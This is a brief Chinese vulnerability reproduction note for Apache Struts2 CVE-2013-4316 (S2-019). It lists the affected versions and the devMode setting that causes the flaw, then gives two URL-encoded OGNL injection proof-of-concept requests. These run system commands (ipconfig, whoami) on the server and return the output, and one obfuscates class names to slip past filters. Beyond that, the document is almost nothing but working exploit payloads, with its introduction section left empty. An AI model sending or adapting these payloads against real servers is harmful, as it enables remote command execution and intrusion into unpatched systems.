(CVE-2013-4316)s2-019

一、漏洞简介

二、漏洞影响

Struts 2.0.0 - Struts 2.3.15.1

三、复现过程

漏洞成因

<constant name="struts.devMode" value="true" />

POC

https://www.0-sec.org/example/HelloWorld.action?debug=command&expression=%23a%3D%28new%20java.lang.ProcessBuilder%28%27ipconfig%27%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B500000%5D%2C%23d.read%28%23e%29%2C%23out%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23out.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%2C%20%23d.read%28%23e%29%2C%23out.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%20%2C%20%23d.read%28%23e%29%2C%23out.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%20%2C%23out.getWriter%28%29.flush%28%29%2C%23out.getWriter%28%29.close%28%29
https://www.0-sec.org/example/HelloWorld.action?debug=command&expression=%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%22whoami%22).getInputStream())),%23resp.getWriter().flush(),%23resp.getWriter().close()